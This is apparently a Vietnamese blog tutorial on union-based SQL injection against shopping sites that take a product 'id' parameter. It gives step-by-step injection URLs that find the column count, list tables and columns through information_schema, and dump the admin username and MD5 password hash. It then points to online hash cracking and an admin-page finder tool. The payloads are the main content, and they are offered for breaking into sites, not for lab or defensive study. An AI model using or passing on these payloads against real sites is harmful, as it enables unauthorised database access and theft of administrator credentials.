id=
category=
decl_id=
num=
sanpham=
product=
và còn một số kiểu khác na ná như trên
ví dụ ta có một site: http://www.domain.com/?frame=product_detail&id=2598
và giao diện của nó như sau
Bước 1: Check lỗi:
Để biết site có dính lỗi hay không ta thêm dấu ' vào sau 2598
http://www.domain.com/?frame=product_detail&id=2598'
Nếu giao diện của site thay đổi tức là site đã bị lỗi sqli
Bước 2: Tìm số trường cột
http://www.domain.com/?frame=product_detail&id=2598 order by 1-- - site bình thường
http://www.domain.com/?frame=product_detail&id=2598 order by 15-- - Site vẫn bình thường
http://www.domain.com/?frame=product_detail&id=2598 order by 16-- - Giao diện website thay đổi.
=> Số trường cột cần tìm là 15
Bước 3: Xác định vị trí trường cột bị lỗi
http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 2598 thì mới xuất hiện ra các con số đẹp.
ví dụ sau khi chạy querry trên chúng ta thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ta sẽ khai thác tại vị trí thứ 2.
Bước 4: Xuất ra tên các tables trong database
http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -
Thông tin về tên các table thu được:
tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor
Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user). Vì vậy ta sẽ khai thác ở table này.
Bước 5: Xuất ra tên các colums chứa username và password
http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -
Lưu ý:
- 0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex
- 74626c5f75736572 là chữ tbl_user ở dạng hex.
- Link convert các ký tự sang mã hex:
Thông tin về tên columns thu được:
id,uid,pwd
Bước 6: Xuất ra thông tin về Username và Password
http://www.domain.com/?frame=product_detail&id=-2598 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -
Thông tin về username và password được mã hóa md5 thu được:
admin/679115597bf9f763506dcc9a8e9e8e82
Bước 7: Crack Password và tìm link admin:
- Có nhiều site để crack passwd, ví dụ: http://md5cracker.org/
Hoặc sử dụng google để tìm kiếm
- Để tìm link admin các bạn có thể dùng phần mềm Web Admin Finder 2.0:
Pass unrar: quylevhb
Nguồn: Mr.Solein
Đăng nhận xét Blogger Facebook